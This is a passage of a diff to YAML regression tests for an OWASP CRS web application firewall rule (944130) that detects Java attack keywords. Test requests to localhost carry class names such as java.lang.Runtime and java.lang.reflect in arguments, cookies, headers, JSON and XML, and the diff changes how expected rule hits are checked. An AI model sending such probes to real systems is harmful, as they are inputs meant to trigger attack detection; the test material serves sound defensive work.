java.lang.reflect" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"test\": \"java.lang.reflect\"}" - output: - log_contains: "id \"944130\"" - - test_title: 944130-341 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"test\": \"java.lang.reflect\"}" + output: + log: + expect_ids: [944130] + - test_id: 341 desc: "Content-Type application/json arg name includes keyword java.lang.reflect" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"java.lang.reflect\": \"test\"}" - output: - log_contains: "id \"944130\"" - - test_title: 944130-342 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: 
"HTTP/1.0" + data: "{\"java.lang.reflect\": \"test\"}" + output: + log: + expect_ids: [944130] + - test_id: 342 desc: "Argument test includes keyword java.lang.Runtime" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=java.lang.Runtime" - output: - log_contains: "id \"944130\"" - - test_title: 944130-343 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=java.lang.Runtime" + output: + log: + expect_ids: [944130] + - test_id: 343 desc: "Argument name includes keyword java.lang.Runtime" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "java.lang.Runtime=test" - output: - log_contains: "id \"944130\"" - - test_title: 944130-344 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + 
Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "java.lang.Runtime=test" + output: + log: + expect_ids: [944130] + - test_id: 344 desc: "Cookie test includes keyword java.lang.Runtime" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: test=java.lang.Runtime - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-345 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=java.lang.Runtime + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log: + expect_ids: [944130] + - test_id: 345 desc: "Cookie name includes keyword java.lang.Runtime" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: java.lang.Runtime=test - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-346 + - input: + dest_addr: 
"127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: java.lang.Runtime=test + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log: + expect_ids: [944130] + - test_id: 346 desc: "Request header test includes keyword java.lang.Runtime" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - test: java.lang.Runtime - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-347 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: java.lang.Runtime + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log: + expect_ids: [944130] + - test_id: 347 desc: "XML attribute value includes keyword java.lang.Runtime" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: 
"application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "element_value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-348 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "element_value" + output: + log: + expect_ids: [944130] + - test_id: 348 desc: "XML element value includes keyword java.lang.Runtime" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "java.lang.Runtime" - output: - log_contains: "id \"944130\"" - - test_title: 944130-349 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "java.lang.Runtime" + output: + log: + expect_ids: [944130] + - test_id: 349 desc: "Nested XML element value includes keyword java.lang.Runtime" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: 
"gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "java.lang.Runtime" - output: - log_contains: "id \"944130\"" - - test_title: 944130-350 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "java.lang.Runtime" + output: + log: + expect_ids: [944130] + - test_id: 350 desc: "Content-Type text/plain includes keyword java.lang.Runtime" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "text/plain" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=java.lang.Runtime" - output: - log_contains: "id \"944130\"" - - test_title: 944130-351 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=java.lang.Runtime" + output: + log: + expect_ids: [944130] + - test_id: 351 desc: "Content-Type application/json arg value includes keyword java.lang.Runtime" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: 
"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"test\": \"java.lang.Runtime\"}" - output: - log_contains: "id \"944130\"" - - test_title: 944130-352 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"test\": \"java.lang.Runtime\"}" + output: + log: + expect_ids: [944130] + - test_id: 352 desc: "Content-Type application/json arg name includes keyword java.lang.Runtime" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"java.lang.Runtime\": \"test\"}" - output: - log_contains: "id \"944130\"" - - test_title: 944130-353 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"java.lang.Runtime\": \"test\"}" + output: + log: + expect_ids: [944130] + - test_id: 353 desc: "Argument test includes keyword 
java.lang.String" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=java.lang.String" - output: - log_contains: "id \"944130\"" - - test_title: 944130-354 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=java.lang.String" + output: + log: + expect_ids: [944130] + - test_id: 354 desc: "Argument name includes keyword java.lang.String" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "java.lang.String=test" - output: - log_contains: "id \"944130\"" - - test_title: 944130-355 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: 
"HTTP/1.0" + data: "java.lang.String=test" + output: + log: + expect_ids: [944130] + - test_id: 355 desc: "Cookie test includes keyword java.lang.String" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: test=java.lang.String - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-356 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=java.lang.String + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log: + expect_ids: [944130] + - test_id: 356 desc: "Cookie name includes keyword java.lang.String" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: java.lang.String=test - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-357 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: 
"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: java.lang.String=test + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log: + expect_ids: [944130] + - test_id: 357 desc: "Request header test includes keyword java.lang.String" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - test: java.lang.String - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-358 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: java.lang.String + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log: + expect_ids: [944130] + - test_id: 358 desc: "XML attribute value includes keyword java.lang.String" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "element_value" - output: - 
log_contains: "id \"944130\"" - - test_title: 944130-359 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "element_value" + output: + log: + expect_ids: [944130] + - test_id: 359 desc: "XML element value includes keyword java.lang.String" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "java.lang.String" - output: - log_contains: "id \"944130\"" - - test_title: 944130-360 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "java.lang.String" + output: + log: + expect_ids: [944130] + - test_id: 360 desc: "Nested XML element value includes keyword java.lang.String" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - 
version: "HTTP/1.0" - data: "java.lang.String" - output: - log_contains: "id \"944130\"" - - test_title: 944130-361 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "java.lang.String" + output: + log: + expect_ids: [944130] + - test_id: 361 desc: "Content-Type text/plain includes keyword java.lang.String" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "text/plain" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=java.lang.String" - output: - log_contains: "id \"944130\"" - - test_title: 944130-362 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=java.lang.String" + output: + log: + expect_ids: [944130] + - test_id: 362 desc: "Content-Type application/json arg value includes keyword java.lang.String" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: 
"en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"test\": \"java.lang.String\"}" - output: - log_contains: "id \"944130\"" - - test_title: 944130-363 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"test\": \"java.lang.String\"}" + output: + log: + expect_ids: [944130] + - test_id: 363 desc: "Content-Type application/json arg name includes keyword java.lang.String" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"java.lang.String\": \"test\"}" - output: - log_contains: "id \"944130\"" - - test_title: 944130-364 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"java.lang.String\": \"test\"}" + output: + log: + expect_ids: [944130] + - test_id: 364 desc: "Argument test includes keyword java.lang.StringBuilder" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: 
"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=java.lang.StringBuilder" - output: - log_contains: "id \"944130\"" - - test_title: 944130-365 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=java.lang.StringBuilder" + output: + log: + expect_ids: [944130] + - test_id: 365 desc: "Argument name includes keyword java.lang.StringBuilder" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "java.lang.StringBuilder=test" - output: - log_contains: "id \"944130\"" - - test_title: 944130-366 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "java.lang.StringBuilder=test" + output: + log: + expect_ids: [944130] + - test_id: 366 desc: "Cookie test 
includes keyword java.lang.StringBuilder" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: test=java.lang.StringBuilder - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-367 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=java.lang.StringBuilder + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log: + expect_ids: [944130] + - test_id: 367 desc: "Cookie name includes keyword java.lang.StringBuilder" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: java.lang.StringBuilder=test - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-368 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + 
